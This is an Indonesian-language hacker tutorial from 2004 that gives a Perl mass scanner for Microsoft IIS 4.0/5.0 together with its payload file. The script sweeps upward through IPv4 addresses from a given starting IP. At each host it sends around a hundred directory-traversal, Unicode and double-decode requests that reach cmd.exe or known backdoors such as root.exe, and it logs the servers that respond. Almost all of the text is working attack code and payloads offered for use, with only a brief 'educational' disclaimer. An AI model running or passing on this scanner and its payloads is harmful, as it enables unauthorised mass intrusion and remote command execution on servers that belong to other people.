/*********************************************************
 * IIS Mass Scanner menggunakan perl script
 * dan satu daftar hole IIS.
 * 
 * Impact : IIS/4.0 dan IIS/5.0 earlier
 *
 * oleh    : iko (iko94@yahoo.com)
 * release : apr,19,2004
 *
 * No Warranty. This tutorial is for educational use only, 
 * commercial use is prohibited.
 *
 **********************************************************/

Masih ingat dengan artikelku yg dulu tentang mass scanning ?
Kali ini ilmu mass scanning akan diterapkan pada scan vulner pada IIS,
dengan menggunakan perl scripting (sorry, aku masih lamer coder, jadinya
masih amatiran :))
Mohon bantuan para neoteker untuk mengoreksi dan terutama melengkapi
daftar bug yang ada di file hole.bug. Thanx a lot.

Based on :
1. IIS Scanner 2002 by Schizoprenic (XNuxer Research Center), win version.
2. Massplo (my fav mass scanner) by slamet/dhegleng, *nix version.
3. Lots of script at www.bosen.net/releases.

Cara :
1. Simpan potongan 2 file di bawah, dengan nama iis-scanner.pl dan hole.bug.
2. chmod +x iis-scanner.pl (jangan lupa ttg permission di folder ybs, sebab nanti akan ada file log jika target ketemu).
3. ./iis-scanner.pl NO_IP_TARGET

======gunting di sini awal iis-scanner.pl==============
#!/usr/bin/perl -w
#
use Socket;
                                                                                
$phile="hole.bug";
open(FH, $phile) || die("Cannot open the file");
@fh=<FH>;
close(FH);

#print "Tes IP : ";
#$nip = <STDIN>;
#chop ($nip);

#if ($#ARGV < 0) {
#print "Syntax mu eror !\n";
#print "Contoh : Program.pl 211.107.41.3\n";
#exit(7);
#die "sintax eror !";
#}

$nip=$ARGV[0];
$nip=~s/\./ /g;
@sip=split(" ",$nip);

$a = $sip[0];
$b = $sip[1];
$c = $sip[2];
$d = $sip[3];

if ($a<0 || $a>255 ) {
  die ("salah range !");
}
                                                                                
if ($b<0 || $b>255 ) {
  die ("salah range !");
}
  
if ($c<0 || $c>255 ) {
  die ("salah range !");
}

if ($d<0 || $d>255 ) {
  die ("salah range !");
}

$aa=$a;
$bb=$b;
$cc=$c;
$dd=$d;

while ($aa<256) {
 while ($bb<256) {
  while ($cc<256) {
   while ($dd<257) {
    if ($dd==256) {
      if ($cc<255) {
       $cc++;
       $dd=0;
      } elsif ($bb<255) {
        $bb++;
        $cc=0;
        $dd=0;
        } elsif ($aa<255) {
          $aa++;
          $bb=0;
          $cc=0;
          $dd=0;
          }
    }
# here the code start
#print "$aa.$bb.$cc.$dd \n";

foreach $elemen(@fh) {
chomp($elemen);
                                                                                
$port=80;
$host="$aa.$bb.$cc.$dd";
$target = inet_aton($host);
$grabz="GET $elemen HTTP/1.0\r\nHost: $host\r\n\r\n";
print $grabz;
@hasil=sendraw($grabz) ;

#if ($_=~/Microsoft-IIS/g) {
print @hasil;
if ($hasil[0] =~/200/g) {
  #if (($hasil[1]=~/Microsoft-IIS/g)||($hasil[2]=~/Microsoft-IIS/g)) {
  if ($hasil[1]=~/Microsoft-IIS/g) {
  @jenis=split(" ",$hasil[1]);
  print "\n\nFile ada !\n";
  print "=======================================\n\n";
  open (OTZ,">>berhasil.log");
  print OTZ "$jenis[1]:$host:$elemen\n";
  close OTZ;
} elsif ($hasil[2]=~/Microsoft-IIS/g) {
  @jenis=split(" ",$hasil[2]);
  print "\n\nFile ada !\n";
  print "=======================================\n\n";
  open (OTZ,">>berhasil.log");
  print OTZ "$jenis[1]:$host:$elemen\n";
  close OTZ;
} else {
  print "Bukan Microsoft-IIS !\n";
  last;
}
} elsif ($hasil[0] =~/400|401|403|404|500|501|502|503/g) {
    print "\n\nGagal !\n";
    print "=======================================\n\n";
} else {
      print "\n\nPort tertutup !\n";
      print  "=======================================\n\n";
      last;
}
}

$dd++;

# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw {   # this saves the whole transaction anyway
        my ($pstr)=@_;
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,$port,$target)){
                my @in;
                select(S);      $|=1;   print $pstr;
                while(<S>){ push @in, $_;}
                select(STDOUT); close(S); return @in;
        }
} # of foreach $elemen

# here the code end
#$dd++;
   } #of $cc
  } # of $cc
 } # of $bb
} # of $aa
======gunting di sini akhir iis-scanner.pl==============

======gunting di sini awal hole.bug=====================
/scripts/root.exe?/c+dir+c:\
/scripts/eyehack.exe?/c+dir+c:\
/scripts/sensepost.exe?/c+dir+c:\
/iisadmpwd/root.exe?/c+dir+c:\
/iisadmpwd/eyehack.exe?/c+dir+c:\
/iisadmpwd/sensepost.exe?/c+dir+c:\
/cgi-bin/root.exe?/c+dir+c:\
/cgi-bin/eyehack.exe?/c+dir+c:\
/cgi-bin/sensepost.exe?/c+dir+c:\
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/samples/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/samples/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\
======gunting di sini akhir hole.bug=====================


TODO:
[*] Added children process pakai socket
[*] Added port 80 scanner [biar gak lemot :)]
[*] Fix unknow error at header grabbing

iko berterimakasih kepada:
[+] qq
[+] tiyox
[+] keputih group
[+] everyone who shouting the freedom

iko tidak berterimakasih kepada:
[-] monopoli
[-] birokrasi
[-] para penjilat
[-] koruptor
[-] closed source

[EOF]